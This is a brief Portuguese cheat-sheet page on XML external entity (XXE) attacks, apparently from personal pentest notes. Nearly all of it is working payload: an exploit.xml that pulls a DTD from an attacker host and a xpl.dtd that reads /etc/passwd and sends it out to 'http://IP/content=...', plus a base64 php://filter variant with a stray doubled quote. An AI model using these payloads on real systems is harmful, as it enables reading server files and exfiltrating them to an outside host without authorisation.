XXE

XXE Comum

  • Arquivo exploit.xml

<?xml version="1.0"?>
<!DOCTYPE nosf[
    <!ELEMENT nosf ANY>
    <!ENTITY % dtd SYSTEM "http://IP/xpl.dtd">
%dtd;]>
<nosf></nosf>

  • Arquivo xpl.dtd

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://IP/content=%file'>">
%all

  • As vezes é bom tentar encodar em base64 também os arquivos. 😉

<!ENTITY % file SYSTEM ""php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://IP/content=%file'>">
%all
PreviousPythonNextRecon

Last updated